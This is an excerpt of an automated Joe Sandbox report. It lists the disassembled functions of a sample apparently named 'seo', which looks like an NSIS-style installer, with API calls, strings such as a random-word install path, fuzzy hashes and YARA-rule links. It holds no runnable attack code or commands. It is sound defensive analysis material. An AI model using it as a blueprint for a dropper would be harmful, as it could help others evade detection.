Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
Instruction ID: 5cd628679c3206996b44c0f0d1c9f7c2e320434dbef64c8d82388663d9783bcf
Opcode Fuzzy Hash: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
Instruction Fuzzy Hash: A091407190061AEBDF109FA4CD88AAFBBB8EF44741F10407AE545F6190DB788A45CF69

Function 0040447D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404494
GetDlgItem.USER32(?,00000408), ref: 004044A1
GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
LoadBitmapW.USER32(0000006E), ref: 00404503
SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
SendMessageW.USER32(?,00001109,00000002), ref: 00404559
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
DeleteObject.GDI32(?), ref: 0040457A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
GetWindowLongW.USER32(?,000000F0), ref: 004046B0
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
ShowWindow.USER32(?,00000005), ref: 004046D0
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
ImageList_Destroy.COMCTL32(?), ref: 0040489D
GlobalFree.KERNEL32(?), ref: 004048AD
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
ShowWindow.USER32(?,00000000), ref: 00404A4A
GetDlgItem.USER32(?,000003FE), ref: 00404A55
ShowWindow.USER32(00000000), ref: 00404A5C

Strings

@, xrefs: 00404691
M, xrefs: 00404644
, xrefs: 00404A3A
N, xrefs: 00404707

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58

Function 00404BB4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 290windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00404C16
GetDlgItem.USER32(?,000003EE), ref: 00404C25
GetClientRect.USER32(?,?), ref: 00404C62
GetSystemMetrics.USER32(00000015), ref: 00404C6A
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
ShowWindow.USER32(?,00000008), ref: 00404D06
GetDlgItem.USER32(?,000003EC), ref: 00404D27
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
GetDlgItem.USER32(?,000003F8), ref: 00404C34

Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E

GetDlgItem.USER32(?,000003EC), ref: 00404D77
CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
CloseHandle.KERNEL32(00000000), ref: 00404D8C
ShowWindow.USER32(00000000), ref: 00404DB3
ShowWindow.USER32(?,00000008), ref: 00404DB8
ShowWindow.USER32(00000008), ref: 00404DFF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
CreatePopupMenu.USER32 ref: 00404E42
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
GetWindowRect.USER32(?,?), ref: 00404E6A
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
OpenClipboard.USER32(00000000), ref: 00404ED7
EmptyClipboard.USER32 ref: 00404EDD
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404EF3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404F29
SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
CloseClipboard.USER32 ref: 00404F3A

Strings

{, xrefs: 00404E1E

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58

Function 0040400B Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 272stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040405A
SetWindowTextW.USER32(?,?), ref: 00404087
SHBrowseForFolderW.SHELL32(?), ref: 0040413F
CoTaskMemFree.OLE32(00000000), ref: 0040414A
lstrcmpiW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,0044FD98,00000000,?,?), ref: 0040417C
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
lstrcatW.KERNEL32(?,EnglandAdventureMinnesotaCourtesyEnsuringEmission), ref: 00404188

Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744

Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE

Strings

A, xrefs: 00404138
EnglandAdventureMinnesotaCourtesyEnsuringEmission, xrefs: 00404176, 0040417B, 00404186

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$EnglandAdventureMinnesotaCourtesyEnsuringEmission
API String ID: 2246997448-3090795980
Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59

Function 00406559 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 162filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
lstrcatW.KERNEL32(00465470,\*.*), ref: 004065C8
lstrcatW.KERNEL32(?,004082C8), ref: 004065E8
lstrlenW.KERNEL32(?), ref: 004065EB
FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
FindClose.KERNEL32(00000000), ref: 004066C6

Strings

pTF, xrefs: 004065AB
\*.*, xrefs: 004065C2

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*$pTF
API String ID: 2035342205-2155356189
Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D

Function 00402218 Relevance: 1.6, APIs: 1, Instructions: 120comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54

Function 004029F1 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D

Function 00406E34 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55

Function 0040680A Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84

Function 00404F45 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
ShowWindow.USER32(?), ref: 00404F9E
DestroyWindow.USER32 ref: 00404FB2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
GetDlgItem.USER32(?,?), ref: 00404FEF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
IsWindowEnabled.USER32(00000000), ref: 0040500A
GetDlgItem.USER32(?,00000001), ref: 004050B9
GetDlgItem.USER32(?,00000002), ref: 004050C3
SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
GetDlgItem.USER32(?,00000003), ref: 004051D4
ShowWindow.USER32(00000000,?), ref: 004051F6
EnableWindow.USER32(?,?), ref: 00405208
EnableWindow.USER32(?,?), ref: 00405223
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
EnableMenuItem.USER32(00000000), ref: 00405240
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
ShowWindow.USER32(?,0000000A), ref: 004053DC

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E

Function 00403C1F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 212windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
GetDlgItem.USER32(?,000003E8), ref: 00403CE7
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
GetSysColor.USER32(?), ref: 00403D15
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
lstrlenW.KERNEL32(?), ref: 00403D3C
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58

Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B

GetDlgItem.USER32(?,0000040A), ref: 00403DB2
SendMessageW.USER32(00000000), ref: 00403DB9
GetDlgItem.USER32(?,000003E8), ref: 00403DE4
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
SetCursor.USER32(00000000), ref: 00403E38
ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
SetCursor.USER32(00000000), ref: 00403E5C
SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D

Strings

EnglandAdventureMinnesotaCourtesyEnsuringEmission, xrefs: 00403E0D
N, xrefs: 00403DD2
open, xrefs: 00403E45

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: EnglandAdventureMinnesotaCourtesyEnsuringEmission$N$open
API String ID: 3928313111-1751993675
Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99

Function 0040635B Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00463E20,NUL), ref: 0040636B
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393

Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6

GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
wsprintfA.USER32 ref: 0040640F
GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5

Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
GlobalFree.KERNEL32(00000000), ref: 00406510
CloseHandle.KERNEL32(?), ref: 0040651A

